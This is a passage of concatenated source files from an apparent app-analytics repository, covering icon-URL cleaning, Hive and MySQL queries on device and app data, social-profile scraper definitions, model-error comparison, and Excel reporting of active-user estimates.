Change the sizes in Android urls.
:param matched_android_apps: Matched Android apps DataFrame
:return: Series with changed url
"""
return matched_android_apps.icon_url.str.replace('=w\d*', '=w64')
def _remove_invalid_icon_urls(self, matched_apps, valid_size_ending):
"""
Remove all apps with icon url with invalid endings.
:param matched_apps: DataFrame with matched iOS apps
:param valid_size_ending: String with valid size ending (e.g. '64' or '64.png')
:returns: DataFrame with only valid sizes
"""
has_valid_sizes = matched_apps.icon_url.str.endswith(valid_size_ending)
matched_apps = matched_apps[has_valid_sizes].reset_index(drop=True)
return matched_apps
def _query_ios_matched_apps(self):
"""
Query matched iOS apps.
:return: Matched iOS apps DataFrame
"""
matched_ios_apps = pd.read_sql_query(app_annie_queries['matched_app_ios'], self.aa_connection)
matched_ios_apps['icon_url'] = self._clean_ios_icon_url(matched_ios_apps)
matched_ios_apps.dropna(axis=0, inplace=True)
matched_ios_apps = self._remove_invalid_icon_urls(matched_ios_apps, '64.png')
return matched_ios_apps
def _clean_ios_icon_url(self, matched_ios_apps):
"""
Clean the size for the iOS url.
:param matched_ios_apps: DataFrame with matched iOS apps
:returns Series with cleaned icon urls
"""
right_size = matched_ios_apps.icon_url.str.replace('icon\d*x\d*.',
'icon64x64.')
right_size = right_size.str.replace('icon_\d*.', 'icon_64.')
return right_size.str.replace('.(jpg|jpeg)', '.png').values
class LocalFiles(DatabaseInterface):
"""
Class to interface with local files.
"""
def __init__(self, all_matches_path='data/csv/all_matches.csv', app_info_path='data/csv/app_info.csv',
matched_apps_path='data/csv/matched_apps.csv'):
self.all_matches = pd.DataFrame.from_csv(all_matches_path, index_col=False)
self.app_info = pd.DataFrame.from_csv(app_info_path, index_col=False)
self.matched_apps = pd.DataFrame.from_csv(matched_apps_path, index_col=False)
def query_all_matches(self):
"""
Query all matches.
:return: All matches DataFrame with columns from_market, from_app_id, to_market, to_app_id
:rtype: pd.DataFrame
"""
return self.all_matches
def query_app_info(self):
"""
Query app info.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return self.app_info
def query_matched_apps(self):
"""
Query matched apps
:return: Matched apps DataFrame with columns market, app_id and icon_url
:rtype: pd.DataFrame
"""
check_icon_paths = lambda x: os.path.exists('icons/' + x.market + '/' + str(x.app_id))
icon_is_scraped = self.matched_apps.apply(check_icon_paths, axis=1)
icon_is_invalid = (self.matched_apps.market == 'gp') & ~self.matched_apps.icon_url.str.endswith('64')
return self.matched_apps.ix[icon_is_scraped & ~icon_is_invalid].reset_index(drop=True)<file_sep>/aa_au_model/hive_ql/conversion_allVPN_active.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-05-03';
set end_date = '2015-05-09';
-- Get all devices connected to VPN
drop table if exists connected_devices;
create table connected_devices
as
select
distinct device_id
from
vpn_sample_data_connection_session
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
;
-- Get unique iOS devices
drop table if exists ios_devices;
create table ios_devices
as
select
device_id
from
vpn_new_device_info
where
platform = 'iOS'
and type in ('Smartphone', 'Tablet')
group by
device_id
;
-- Get iOS devices connected to VPN during the selected week
drop table if exists connected_devices_ios;
create table connected_devices_ios
as
select
ios.device_id
from
ios_devices ios
join connected_devices connected
on ios.device_id = connected.device_id
;
-- Select devices that are active for the selected week
drop table if exists period_active_weekly;
create table period_active_weekly
as
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
drop table if exists active_devices;
create table active_devices
as
select
device_id
from
period_active_weekly
where
end_period_date = ${hiveconf:end_date}
;
-- Get iOS devices connected to VPN that are also active for the selected week
drop table active_devices_ios;
create table active_devices_ios
as
select
active.device_id
from
connected_devices_ios connected
join active_devices active
on connected.device_id = active.device_id
;
-- Get ratio active devices / connected devices
select
active.count,
connected.count,
round(active.count / connected.count * 100, 1)
from (
select
count(*) as count
from
active_devices_ios
) active
JOIN
(
select
count(*) as count
from
connected_devices_ios
) connected
;
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/items.py
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ScraperItem(scrapy.Item):
name = scrapy.Field()
account_name = scrapy.Field()
bio = scrapy.Field()
location = scrapy.Field()
join_date = scrapy.Field()
homepage = scrapy.Field()
n_tweets = scrapy.Field()
n_following = scrapy.Field()
n_followers = scrapy.Field()
n_favorites = scrapy.Field()
n_lists = scrapy.Field()<file_sep>/audience/google-plus-scraping/lib/scraper/scraper/constants.py
SCRAPE_ACCOUNT = {'Email': '<EMAIL>',
'Passwd': '<PASSWORD>'}
DIV_PATHS = {'account_name': "//div[@guidedhelpid='profile_name']/text()",
'basic_information': "//div[@id=11]//div[contains(@class, 'wna DVb')]",
'basic_information_keys': "//div[contains(@class, 'E9a G9a Rqc')]/text()",
'basic_information_values': "//div[contains(@class, 'y4 G9a')]/text()",
'apps_signin': "//div[@id=27]//ul[contains(@class, 'Kla yVa')]",
'apps_signin_values': "//a[contains(@class, 'OLa ob url')]/text()",
'in_circles': "//div[@id=24]//div[contains(@class, 'ikb')]",
'in_circles_values': "//a[contains(@class, 'ob Jk')]/@href",
'education': "//div[@id=9]//li[contains(@class, 'UZa')]",
'school_names': "//div[contains(@class, 'PLa')]/text()",
'work': "//div[@id=8]//div[contains(@class, 'wna')]",
'places': "//div[@id=12]//div[contains(@class, 'AAa')]"}
<file_sep>/publisher_cv/gen_model_compare_summary_v2.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: compare models with ver to v8, generate final summary
#
##
import pandas as pd
import numpy as np
#import matplotlib.pyplot as plt
import os
#import config
def analyze_results(df):
describe = []
df2 = []
df = df.dropna(subset=['actual'])
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date']):
g = g.sort('actual', ascending=False)
g['analytics_range'] = '201 to end'
g['analytics_range'][:200] = '21 to 200'
g['analytics_range'][:20] = '11 to 20'
g['analytics_range'][:10] = '1 to 10'
g['analytics_wt'] = 0.1
g['analytics_wt'][:200] = 0.5
g['analytics_wt'][:20] = 0.9
g['analytics_wt'][:10] = 1.0
df2.append(g)
df = pd.concat(df2)
del df2
df.to_csv('%s/error_source_%s.csv'%(plot_dir, store_id))
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date', 'analytics_range']):
t_under_20 = []
t_under_20.append(float(g[g['sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['tae_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['tae_scored_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['t12e_7d_rel_error']<=0.2].shape[0])/g.shape[0])
d = g[['store_id', 'feed_id', 'date', 'category_id', 'actual', 'analytics_range', 'analytics_wt', 'mkt_size', 'sbe_rel_error', 'tae_rel_error', 'tae_scored_rel_error', 't12e_7d_rel_error']].describe()
t_under_20_max = np.max(t_under_20)
s = pd.Series()
s.name = '%_apps_under_20%_error'
d = d.append(s)
s = pd.Series()
s.name = 'best_case'
d = d.append(s)
d['sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[0]
d['tae_rel_error']['%_apps_under_20%_error'] = t_under_20[1]
d['tae_scored_rel_error']['%_apps_under_20%_error'] = t_under_20[2]
d['t12e_7d_rel_error']['%_apps_under_20%_error'] = t_under_20[3]
d['sbe_rel_error']['best_case'] = 1 if t_under_20[0]==t_under_20_max else 0
d['tae_rel_error']['best_case'] = 1 if t_under_20[1]==t_under_20_max else 0
d['tae_scored_rel_error']['best_case'] = 1 if t_under_20[2]==t_under_20_max else 0
d['t12e_7d_rel_error']['best_case'] = 1 if t_under_20[3]==t_under_20_max else 0
if d[['sbe_rel_error', 'tae_rel_error', 'tae_scored_rel_error', 't12e_7d_rel_error']]['best_case':'best_case'].values.sum() > 1:
#min_error = d[['sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']]['mean':'mean'].values.min()
min_error = []
min_error.append(d['sbe_rel_error']['mean'] if d['sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['tae_rel_error']['mean'] if d['tae_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['tae_scored_rel_error']['mean'] if d['tae_scored_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['t12e_7d_rel_error']['mean'] if d['t12e_7d_rel_error']['best_case']==1 else 1000.0)
min_error = np.min(min_error)
d['sbe_rel_error']['best_case'] = 1 if (d['sbe_rel_error']['best_case']==1 and d['sbe_rel_error']['mean']==min_error) else 0
d['tae_rel_error']['best_case'] = 1 if (d['tae_rel_error']['best_case']==1 and d['tae_rel_error']['mean']==min_error) else 0
d['tae_scored_rel_error']['best_case'] = 1 if (d['tae_scored_rel_error']['best_case']== 1 and d['tae_scored_rel_error']['mean']==min_error) else 0
d['t12e_7d_rel_error']['best_case'] = 1 if (d['t12e_7d_rel_error']['best_case']==1 and d['t12e_7d_rel_error']['mean']==min_error) else 0
d['store_id'] = n[0]
d['feed_id'] = n[1]
d['category_id'] = n[2]
d['date'] = n[3]
d['analytics_range'] = n[4]
describe.append(d)
describe = pd.concat(describe)
return describe
def process_df(df):
#df = df[df['index']=='best_case']
df = df[df['index']=='mean']
#df = df.groupby(['store_id', 'feed_id', 'category_id', 'range']).sum().reset_index()
df['sbe_rel_error'] = np.round(df['sbe_rel_error'], 4)
df['tae_rel_error'] = np.round(df['tae_rel_error'], 4)
df['tae_scored_rel_error'] = np.round(df['tae_scored_rel_error'], 4)
df['t12e_7d_rel_error'] = np.round(df['t12e_7d_rel_error'], 4)
df['sbe_final_score'] = df['mkt_size'] * df['analytics_wt']/ (np.exp(df['sbe_rel_error']))
df['tae_final_score'] = df['mkt_size'] * df['analytics_wt']/(np.exp(df['tae_rel_error']))
df['tae_scored_final_score'] = df['mkt_size'] * df['analytics_wt']/(np.exp(df['tae_scored_rel_error']))
df['t12e_7d_final_score'] = df['mkt_size'] * df['analytics_wt']/(np.exp(df['t12e_7d_rel_error']))
return df
def main():
global store_id
global plot_dir
global ver
ver = 'v1' ## model to be compared with v8
res_dir = '/Users/perezrafael/appannie/data/estimates_public_companies'
plot_dir = 'LogInv_Compare_Summary'
filelist= []
store_ids = set()
for root, dirs, files in os.walk(res_dir):
for file in files:
#if file.endswith(".csv.bz2") and '143441' in file:
if file.endswith(".csv") and ver in file and 'res_' in file and 'stg' not in file:
filepath = os.path.join(root, file)
filelist.append(file)
store_ids.add(file.split('_')[1])
#store_ids.clear()
#store_ids.add('143491')
if True:
for i in sorted(list(store_ids)):
store_id = i
print '======== country',store_id
filepath_v8 = '%s/res_%s_v1.csv'%(res_dir, store_id)
#filepath_7d = '%s/res_%s_%s.csv'%(res_dir, store_id, ver)
filepath_stg = '%s/res_stg_%s_v1.csv'%(res_dir, store_id)
gres_v8 = pd.read_csv(filepath_v8)
#gres_7d = pd.read_csv(filepath_7d)
gres_stg = pd.read_csv(filepath_stg)
gres_v8 = gres_v8[['store_id', 'date', 'app_id', 'feed_id', 'actual', 'Daily.Estimate', 'tae']]
gres_v8 = gres_v8[gres_v8['Daily.Estimate'] <> float('Inf')]
gres_v8 = gres_v8[gres_v8['tae'] <> float('Inf')]
#gres_v8 = gres_v8[gres_v8['tae_scored'] <> float('Inf')]
gres_stg = gres_stg[['store_id', 'date', 'app_id', 'feed_id', 'category_id', 'iphone_rank', 'ipad_rank']]
#gres_stg.rename(columns={'tae': 'cat_est'}, inplace=True)
df_plot = gres_stg.merge(gres_v8, on=['store_id', 'app_id', 'date', 'feed_id'], how='left')
mkt = df_plot[['store_id', 'feed_id', 'category_id', 'date', 'tae']].groupby(['store_id', 'feed_id', 'category_id', 'date']).sum().reset_index()
mkt.rename(columns={'tae': 'mkt_size'}, inplace=True)
#gres_7d = gres_7d[['store_id', 'date', 'app_id', 'feed_id', 'tae_scored']]
#gres_7d.rename(columns={'tae_scored': 'tae_scored_7d'}, inplace=True)
#df_plot = df_plot.merge(gres_7d, on=['store_id', 'app_id', 'date', 'feed_id'], how='left')
df_plot = df_plot.dropna(subset = ['actual'])
df_plot['sbe_rel_error'] = (df_plot['Daily.Estimate'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot['tae_rel_error'] = (df_plot['tae'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot['tae_scored_rel_error'] = (df_plot['tae'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot['t12e_7d_rel_error'] = (df_plot['tae'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot = df_plot.merge(mkt, on=['store_id', 'date', 'category_id', 'feed_id'], how='left')
#gres = gres.dropna(subset=[['tae', 't12e_r']])
describe = analyze_results(df_plot)
describe.to_csv('%s/error_describe_%s.csv'%(plot_dir, store_id))
print('Generating final summary')
result= []
for root, dirs, files in os.walk(plot_dir):
for file in files:
f = file.split('_')
if file.endswith(".csv") and 'error_describe' in file:
filepath = os.path.join(root, file)
df = pd.read_csv(filepath)
df['index'] = df['Unnamed: 0']
del df['Unnamed: 0']
df = process_df(df)
result.append(df)
result = pd.concat(result)
result.to_csv('%s/final_summary.csv'%(plot_dir), index=False)
print('Done == ')
pass
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/android/1001d2-prepare_application_data-remove_known_preinstalls.sql
/*
Set real_value of known preinstalls to preinstalled_value, effectively
removing them from the estimation procedure. The known preinstalls
are removed globally.
Note that is a very greedy approach: preinstalled apps are often
device-, country and carrier-specific. For instance, Cut the Rope seemed
to be bundled with the Samsung Galaxy S5 for US but was not installed for a
phone in the Netherlands.
INPUT TABLE(S) : temp.application_data,
temp.settings_excluded_preinstalled_apps
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) :
QUERY STEPS :
*/
UPDATE
temp.application_data a
JOIN temp.settings_excluded_preinstalled_apps e
ON a.application_id = e.application_id
SET
-- Note that the ordering is important, else NULL will be set as
-- preinstalled value.
a.preinstalled_value = a.real_value,
a.real_value = NULL
WHERE
a.type = 'free'
;<file_sep>/aa_au_model/correction/validation.py
import data
import datetime
import numpy as np
import pandas as pd
import utils
from collections import OrderedDict
from IPython.display import display
from IPython.html import widgets
from matplotlib import pyplot as plt
colors = {
'red': '#F5A9BC',
'blue': '#A9A9F5',
'grey': '#E6E6E6',
'orange': '#FAAC58',
'green': '#82FA58',
'white': '#FFFFFF',
'purple': '#FA58F4'
}
growth_params = {
'type': '3_color_scale',
'min_color': colors['blue'], 'mid_color': colors['white'],
'max_color': colors['red'],
'min_value': -0.5, 'mid_value': 0, 'max_value': 0.5,
'min_type': 'num', 'mid_type': 'num', 'max_type': 'num'
}
abs_growth_params = {
'type': '2_color_scale',
'min_color': colors['white'], 'max_color': colors['orange'],
'min_value': 0, 'max_value': 0.5,
'min_type': 'num', 'max_type': 'num'
}
age_params = {
'type': '3_color_scale',
'min_color': colors['grey'], 'mid_color': colors['white'],
'max_color': colors['green'],
'min_value': 0, 'mid_value': 0.5, 'max_value': 1,
'min_type': 'num', 'mid_type': 'num', 'max_type': 'num'
}
gender_params = {
'type': '3_color_scale',
'min_color': colors['purple'], 'mid_color': colors['white'],
'max_color': colors['blue'],
'min_value': 0, 'mid_value': 0.5, 'max_value': 1,
'min_type': 'num', 'mid_type': 'num', 'max_type': 'num'
}
APP_COLUMNS = ['app_id', 'device_type']
DATE_COLUMNS = ['end_date', 'device_type']
DEMOGRAPHIC_COLUMNS = ['female,old', 'female,young',
'male,old', 'male,young']
GROWTH_COLS = ['au_v2', 'au_v1']
growth_names = ['growth_' + c for c in GROWTH_COLS]
PP_GROWTH_COLS = ['young', 'male'] + DEMOGRAPHIC_COLUMNS
pp_growth_names = ['pp_growth_' + c for c in PP_GROWTH_COLS]
def get_estimated_sample_composition(probabilities):
"""
Calculate the sample composition from the estimated probabilities per device.
:param probabilities: DataFrame with probabilities per device
:return DataFrame with sample composition per platform,device_type,end_date
"""
sample_composition = probabilities.groupby(['platform', 'device_type', 'end_date']).sum()
return sample_composition.divide(sample_composition.sum(axis=1), axis='rows')
def get_fb_insights_composition(fb_insights, cumulative=True):
"""
Calculate the Facebook Insights composition per week.
:param fb_insights: DataFrame Facebook Insights composition per day
:param cumulative: If True, returned composition is cumulated week over week. If False, only first connection data
is summed over week
:return DataFrame with Facebook Insights composition per platform,end_date
"""
fb_insights['bucket'] = fb_insights.gender + ',' + fb_insights.age_bin.apply(lambda x: ('young' if x == '13-24' else
'old'))
fb_insights['end_date'] = fb_insights.date.apply(utils.get_week_end)
fbi_summary = fb_insights.groupby(['bundle_id', 'end_date', 'bucket']).agg({'count': 'sum',
'date': 'max'}).reset_index()
fbi_summary['cumsum'] = fbi_summary.groupby(['bundle_id', 'bucket'])['count'].cumsum()
fbi_summary = fbi_summary.fillna(0)
if cumulative:
column_name = 'cumsum'
else:
column_name = 'count'
fbi_composition = fbi_summary.set_index(['bundle_id', 'end_date', 'bucket'])[column_name].unstack()
return fbi_composition.divide(fbi_composition.sum(axis=1), axis='rows')
def validate_bucket_estimations(probabilities, adx, return_share=False):
"""
Calculate the true buckets of users that have a bucket prediction of >= 75%.
:param probabilities: DataFrame with probabilities per device
:param adx: DataFrame with adx data
:param return_share: If True, returns share of true buckets. If False, absolute count.
:return DataFrame with true bucket composition per platform,device_type,end_date,estimated_bucket
"""
adx_useful = adx[~((pd.isnull(adx.gender)) | (pd.isnull(adx.age_bin)))].copy()
adx_useful['age_binned'] = adx_useful.age_bin.apply(lambda x: 'young' if x == '13-24' else 'old')
adx_useful['bucket'] = adx_useful.gender + ',' + adx_useful.age_binned
labels = probabilities.columns[~probabilities.columns.isin(['device_id', 'end_date', 'device'])].values
validate_m_prbas = pd.melt(probabilities, id_vars=['device_id', 'platform', 'device_type', 'end_date'])
validate_m_prbas = validate_m_prbas[validate_m_prbas.value >= 0.75]
validate_m_prbas = pd.merge(validate_m_prbas,
adx_useful[adx_useful.bucket.isin(labels)][['device_id', 'bucket']],
on='device_id')
GROUP_COLS = ['platform', 'device_type', 'end_date', 'variable', 'bucket']
validate_m_prbas = validate_m_prbas.groupby(GROUP_COLS).device_id.count().reset_index()
validate_m_prbas = validate_m_prbas.set_index(GROUP_COLS).unstack()
if return_share:
validate_m_prbas = validate_m_prbas.divide(validate_m_prbas.sum(axis=1), axis='rows')
return validate_m_prbas
def get_active_user_stats(time_frame):
"""
Get all active users stats.
:param time_frame: Time Frame to load ('weekly' or 'monthly')
:type time_frame: str
:return: Active user stats
:rtype pandas.DataFrame
"""
active_users = data.load_active_users(time_frame)
app_info = data.load_dpi_apps(datetime.datetime.now().date() -
datetime.timedelta(days=10))
active_users = pd.merge(active_users, app_info)
return _compute_statistics(active_users)
def _compute_statistics(active_users, top_rank=150):
"""
Compute active user statistics.
:param active_users: Active users with app info (see data.load_active_users())
:type active_users: pandas.DataFrame
:param top_rank: Min rank that will be flagged as a top rank
:type top_rank: int
:return: active_users adjusted with some stats
:rtype: pandas.DataFrame
"""
app_groups = active_users.groupby(APP_COLUMNS)
date_groups = active_users.groupby(DATE_COLUMNS)
# Info cols.
active_users['date'] = active_users.end_date.dt.date
active_users['app_name'] = active_users['app_name'].str.decode('ascii',
'ignore')
active_users['device_type'] = active_users.device_type.map({1: 'iPhone', 2: 'iPad'})
# Compute demographic stats.
demographic_fraction = active_users[DEMOGRAPHIC_COLUMNS].divide(active_users.au_v2,
axis='rows')
active_users[DEMOGRAPHIC_COLUMNS] = demographic_fraction
active_users['young'] = active_users['female,young'] + active_users['male,young']
active_users['male'] = active_users['male,young'] + active_users['male,old']
# Compute rank stats.
active_users[['rank_v1', 'rank_v2']] = date_groups[['au_v1', 'au_v2']].rank(method='first',
ascending=False)
active_users['top_app'] = active_users['rank_v2'] <= top_rank
# Compute growth stats.
active_users[growth_names] = app_groups[GROWTH_COLS].apply(lambda x: x.diff() / x)
active_users[pp_growth_names] = app_groups[PP_GROWTH_COLS].apply(lambda x: x.diff())
active_users['growth_au_v2_abs'] = active_users.growth_au_v2.abs()
active_users['change_v2_v1'] = active_users.au_v2 / active_users.au_v1 - 1
active_users['rank_diff'] = active_users['rank_v2'] - active_users['rank_v1']
active_users['rank_growth'] = app_groups['rank_v2'].apply(lambda x: - x.diff())
return active_users
def output_report(active_users_stats, time_frame, date, output_folder='out/checks/'):
"""
Output Excel report for iPad and iPhone estimates.
:param active_users_stats: All active user stats (see get_active_user_stats())
:type active_users_stats: pandas.DataFrame
:param time_frame: Time Frame to load ('weekly' or 'monthly')
:type time_frame: str
:param date: End date to output
:type date: datetime.datetime
:param output_folder: Folder to save to
:type output_folder: str
:return: None
"""
device_groups = active_users_stats.groupby('device_type')
for device, device_au in device_groups:
file_name = '_'.join(['au', time_frame, str(date.date()), device]) + '.xlsx'
output_path = output_folder + file_name
# Filter.
current_au = device_au[(device_au.end_date == date) &
device_au.data_check1].copy()
previous_au = device_au[(device_au.end_date <= date) &
device_au.data_check1].copy()
# Get data.
leaderboard = _get_leaderboard(current_au)
composition = _get_composition(current_au)
growers = _get_growth(current_au)
problem_apps = _get_problem_apps(previous_au)
_output_to_excel(output_path, leaderboard, composition, growers,
problem_apps)
def _get_leaderboard(period_au):
"""
Get leaderboard stats.
:param period_au: Active users stats for a period
:type period_au: pandas.DataFrame
:return: Leaderboard
:rtype pandas.DataFrame
"""
LEADERBOARD_ORDERING = ['app_name', 'bundle_id', 'rank_v2', 'au_v2',
'growth_au_v2', 'rank_growth', 'au_v1', 'change_v2_v1',
'rank_v1', 'rank_diff', 'top_app']
leaderboard = period_au[LEADERBOARD_ORDERING].copy()
leaderboard.sort('rank_v2', inplace=True)
leaderboard.rename(columns=_prettify_column_name, inplace=True)
return leaderboard
def _get_composition(period_au):
"""
Get composition stats.
:param period_au: Active users stats for a period
:type period_au: pandas.DataFrame
:return: Composition stats
:rtype pandas.DataFrame
"""
COMPOSITION_ORDERING = (['app_name', 'bundle_id', 'au_v2', 'rank_v2'] +
DEMOGRAPHIC_COLUMNS +
['young', 'male', 'top_app'])
composition = period_au[COMPOSITION_ORDERING].copy()
composition.sort(['top_app', 'au_v2'], ascending=False, inplace=True)
composition.rename(columns=_prettify_column_name, inplace=True)
return composition
def _get_growth(period_au):
"""
Get growth stats.
:param period_au: Active users stats for a period
:type period_au: pandas.DataFrame
:return: Growth stats
:rtype pandas.DataFrame
"""
GROWTH_ORDERING = (['app_name', 'bundle_id', 'au_v2', 'rank_v2'] +
growth_names + pp_growth_names +
['top_app'])
growers = period_au[GROWTH_ORDERING].copy()
growers.sort(['top_app', 'growth_au_v2'], ascending=False, inplace=True)
growers.rename(columns=_prettify_column_name, inplace=True)
return growers
def _get_problem_apps(au):
"""
Get apps that are new or now missing.
:param au: Active users stats
:type au: pandas.DataFrame
:return: Problem stats
:rtype pandas.DataFrame
"""
temp = au[au.data_check1]
estimated_apps = pd.pivot_table(temp, index=['app_name', 'bundle_id'],
columns='end_date', values='country',
aggfunc=lambda x: True if x.any() else False,
fill_value=False)
if estimated_apps.shape[1] > 1:
last_two_periods = estimated_apps.ix[:, -2:]
# Problem apps: new or missing apps.
problem_apps = last_two_periods.ix[last_two_periods.sum(axis=1) == 1].copy()
problem_apps.columns = ['previous', 'current']
status = ['missing', 'newly estimated']
problem_apps['status'] = problem_apps.current.apply(lambda x: status[x])
problem_apps.reset_index(inplace=True)
problem_apps.sort(['status', 'app_name'], inplace=True)
problem_apps.drop(['previous', 'current'], axis=1, inplace=True)
problem_apps.rename(columns=_prettify_column_name, inplace=True)
else:
problem_apps = pd.DataFrame({'app_name': None, 'bundle_id': None,
'previous': None, 'current': None},
index=[0])
return problem_apps
def _prettify_column_name(s):
"""
Prettify column names.
:param s: Name
:rtype s: str
:return: Prettified name
:rtype: str
"""
s = s.capitalize()
s = s.replace('Au_', '')
s = s.replace('au_', '')
s = s.replace('v1', 'V1')
s = s.replace('v2', 'V2')
s = s.replace('_', ' ')
return s
def _output_to_excel(output_path, leaderboard, composition, growers, problem_apps):
"""
Output report to excel.
:param output_path: Output path
:type output_path: str
:param leaderboard: Leaderboard stats (see _get_leaderboard())
:type leaderboard: pandas.DataFrame
:param composition: Composition stats (see _get_composition())
:type composition: pandas.DataFrame
:param growers: Growth stats (see _get_growth())
:type growers: pandas.DataFrame
:param problem_apps: Problem apps stats (see _get_composition())
:type problem_apps: pandas.DataFrame
:return: None
"""
with pd.ExcelWriter(output_path, engine='xlsxwriter') as excel_writer:
workbook = excel_writer.book
number_format = workbook.add_format({'num_format': 0x03})
percentage_format = workbook.add_format({'num_format': 0x0a})
def df_to_sheet(df, sheet_name):
"""
:param df: DataFrame to output
:type df: pandas.DataFrame
:param sheet_name: Name of sheet
:type sheet_name: str
:return: Outputted sheet
:rtype: xlsxwriter.Worksheet
"""
df.to_excel(excel_writer, index=False, sheet_name=sheet_name)
return excel_writer.sheets[sheet_name]
def set_conditional_formatting(sheet, begin_col, end_col, params):
""" Set conditional formatting for a range of columns for rows 2:end.
:param sheet: Sheet to format
:type sheet: xlsxwriter.Worksheet
:param begin_col: Begin column
:type begin_col: str
:param end_col: End column
:type end_col: str
:param params: Parameter to use (see Worksheet.conditional_format())
:type params: dict
:return: None
"""
n_row = sheet.dim_rowmax + 1
cell_range = '%s%i:%s%i' % (begin_col, 2, end_col, n_row)
sheet.conditional_format(cell_range, params)
def format_leaderboard(sheet, n_cols):
""" Format Leaderboard sheet.
:param sheet: Leaderboard sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.autofilter(0, 0, 1, n_cols-1)
sheet.freeze_panes(1, 4)
set_conditional_formatting(sheet, 'E', 'E', growth_params)
set_conditional_formatting(sheet, 'H', 'H', growth_params)
sheet.set_column('E:E', None, percentage_format)
sheet.set_column('D:D', None, number_format)
sheet.set_column('G:G', None, number_format)
sheet.set_column('H:H', None, percentage_format)
sheet.set_column('C:L', width=15)
sheet.set_column('A:A', width=20)
def format_composition(sheet, n_cols):
""" Format Composition sheet.
:param sheet: Composition sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.freeze_panes(1, 4)
sheet.autofilter(0, 0, 1, n_cols-1)
set_conditional_formatting(sheet, 'E', 'H', abs_growth_params)
set_conditional_formatting(sheet, 'I', 'I', age_params)
set_conditional_formatting(sheet, 'J', 'J', gender_params)
sheet.set_column('E:J', None, percentage_format)
sheet.set_column('C:C', None, number_format)
sheet.set_column('C:K', width=15)
sheet.set_column('A:A', width=30)
def format_growers(sheet, n_cols):
""" Format Growers sheet.
:param sheet: Growers sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.autofilter(0, 0, 1, n_cols-1)
sheet.freeze_panes(1, 4)
set_conditional_formatting(sheet, 'E', 'L', growth_params)
sheet.set_column('E:L', None, percentage_format)
sheet.set_column('C:C', None, number_format)
sheet.set_column('C:M', width=20)
sheet.set_column('A:A', width=30)
def format_problem_apps(sheet, n_cols):
""" Format Problem apps sheet.
:param sheet: Problem apps sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.autofilter(0, 0, 1, n_cols-1)
sheet.freeze_panes(1, 2)
sheet.set_column('C:C', width=15)
sheet.set_column('A:A', width=30)
leaderboard_sheet = df_to_sheet(leaderboard, 'Leaderboard')
composition_sheet = df_to_sheet(composition, 'Composition')
growers_sheet = df_to_sheet(growers, 'Growth')
problem_apps_sheets = df_to_sheet(problem_apps, 'New or missing apps')
format_leaderboard(leaderboard_sheet, leaderboard.shape[1])
format_composition(composition_sheet, composition.shape[1])
format_growers(growers_sheet, growers.shape[1])
format_problem_apps(problem_apps_sheets, problem_apps.shape[1])
def show_app_estimates(active_users_stats, n_plots_per_page=10, plot_size=4):
"""
Show app estimates dynamically.
:param active_users_stats: All active user stats (see get_active_user_stats())
:type active_users_stats: pandas.DataFrame
:param n_plots_per_page: # plots per page
:type n_plots_per_page: int
:param plot_size: Size of subplot
:type plot_size: int
:return: None
"""
def plot_wrapper(device_type, date, metric, sort_by, page):
_create_plot(active_users_stats, device_type, date, metric, sort_by, page,
n_plots_per_page, plot_size)
# Create all widgets and add them to the wrapper function.
children = _create_dropdowns_from_df(active_users_stats, ['device_type', 'date'])
children['metric'] = _create_dropdown(['AU', 'Demographics', 'Age & Gender'])
children['sort_by'] = _create_dropdown(['au_v1', 'au_v2'] + DEMOGRAPHIC_COLUMNS +
['young', 'male'])
max_plots = active_users_stats.groupby(['end_date', 'device_type'])['bundle_id'].count().max()
children['page'] = widgets.IntSlider(description='page', value=1, min=1,
max=int(np.ceil(max_plots * 1. / n_plots_per_page)))
interactive_widgets = widgets.interactive(plot_wrapper, **children)
# Create containers with horizontal orientation and put those in a container.
sub_container_1 = widgets.HBox(children=interactive_widgets.children[:-1])
sub_container_2 = widgets.HBox(children=(interactive_widgets.children[-1], ))
container_main = widgets.Box(children=(sub_container_1, sub_container_2))
# Display.
display(container_main)
plot_wrapper(*(wid.value for wid in children.itervalues()))
def _create_plot(active_users_stats, device, date, metric, sort_by, page, n_plots_per_page, plot_size):
"""
Create the interactive plot manipulated by the widgets.
:param active_users_stats: All active user stats (see get_active_user_stats())
:type active_users_stats: pandas.DataFrame
:param device: Device to show ('iPad' or 'iPhone')
:type device: str
:param date: Latest date to show for
:type date: datetime.datetime
:param metric: Metric to plot ('AU', 'Age & Gender' or 'Demographics')
:type metric: str
:param sort_by: Column to sort by
